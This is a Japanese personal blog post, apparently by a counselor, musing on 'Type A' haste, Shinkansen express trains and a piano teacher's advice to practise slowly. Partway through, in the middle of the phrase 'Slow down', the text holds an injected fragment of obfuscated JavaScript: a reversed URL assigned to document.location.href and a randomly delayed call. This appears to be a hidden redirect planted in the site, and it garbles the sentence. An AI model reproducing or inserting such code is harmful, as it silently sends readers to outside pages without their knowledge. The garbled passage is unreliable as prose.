こころが特急な件

こんにちは、最近天気も気温も変化が急激ですね。こんな日は何を着て外出するか迷います。 今日は「こころの特急」について考えてみたいと思います。私自身に対する警告でもあります。 交通手段もコミュニケーションも迅速になりました … “こころが特急な件” の続きを読む

こんにちは、最近天気も気温も変化が急激ですね。こんな日は何を着て外出するか迷います。

今日は「こころの特急」について考えてみたいと思います。私自身に対する警告でもあります。

交通手段もコミュニケーションも迅速になりました。改札にはほとんど駅員さんもいないし、Suicaだし、新幹線の切符もネットで手に入ります。高速道路もETC利用者の方がほとんどでしょう。便利な世の中です。毎週、移動時の新幹線は「のぞみ」が止まらない駅なので「ひかり」を利用しております。新幹線ホームで待っている時「こだま」はお見かけしないのですが、「のぞみ」は真ん中の線路をもうこれはすざましい速度と音で通過していきます。「シューンーシューンゴー」っていう感じです。

img_0967

あぁ、のぞみって速くてなんてカッコいい!と思うんです。

その一方で、ホームでの話し声はのぞみ通過とともに掻き消されてしまうか、もっと大きい声で話すかのどちらかになります。

のぞみという名の「 ホノボノdestroyer\(//∇//)\   涙」

そこで私も反省しました。通過するのぞみのようになっていないか。人生焦っていないかなぁ。大切に時間を過ごせているのかなぁ。食事の速度も早いし、趣味のピアノも上手になりたくて、つい急いてしまいます。

img_0042

ピアノ講師に教授いただきました。「上手くなりたいならゆっくり丁寧に弾け!全体を通すんじゃなくて、出来ないところを何度もゆっくり、もっと、まだまだゆっくり弾け。乱暴でピアノが可哀想だ」と…。ピアノ講師のご指摘通りです。臨床場面でもクライエント様に同じことを求めている可能性に関して内省いたしました。

img_0821

私のように生き急いでいるタイプをアメリカ人の医師であるフリードマン先生は(Friedman)は「タイプA性格」と分類しています。タイプA性格傾向(熱血だけど短気でせっかちなタイプ) は虚血性心疾患などによる突然死も危惧されるそうです。その他にはのんびりマイペースな「タイプB性格」、心配性で悪性新生物と親和性のある心配性で神経質な「タイプC性格」などがあるそうです。

先述のピアノ講師は曲によってタイプA的・B的・C的をチャンポンさせたり使い分けた演奏ができます。「どうしたらそんな演奏が出来るのでしょうか」と聴いてみたところ「徹底的にゆっくり部分練習すること」だそうです。multipleだ!精度の悪い特急みたいなタイプA 的キャラが顕著である私にとって青春18切符的なゆっくりさに耐えることは至難の技!

人にはだれでも多面性があります。ですからある特定の型番だけに当てはめられたり、何か決めつけられるのはイヤなものです。私だって多面的になりたい。ある時には迅速な思考でシャープに見立てが出来たり、ある時はのんびり過ごすことができるたり、ある時には優しくて心配性過ぎやしないかい?そんな臨床がしたい。

そんな多面的なスキルを養うためにはDo more ではなくてSlow toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}down こそが重要だということなのでしょう。外に出て自分の一歩を振り返ること、いつも起こっている毎日のあたりまえの生活を大切にすること、外食ばかりではなく時にはのんびり料理をしたり…。

img_1251

 

料理は苦手だし、性格自体を変えることは難しいことだけど、指摘してくれる誰かがいる環境に感謝して、生涯発達理論の考えに基づいて私も成長出来ることを信じてみよう。ストレスを感じない鈍感さではなく、のんきでマイペースでストレスに対処出来る力を今からでも身につけてみたいと改めて考えました。

img_0998

でもね、こんなきれいごとを言っても…現実は厳しい。生活のために時間や日々の雑事に追われてばかりです。いつか…ゆっくり休みを取って、のんびり旅に出たり花を愛でたりしたいものです。
img_0913

お読みいただきありがとうございました。加湿器の恋しい季節です。ウイルス対策には不織布のマスク、喉の乾燥には不織布ではなく昔ながらのガーゼのマスクが良いらしいです。是非使い分けをお試ししてみて下さいね☆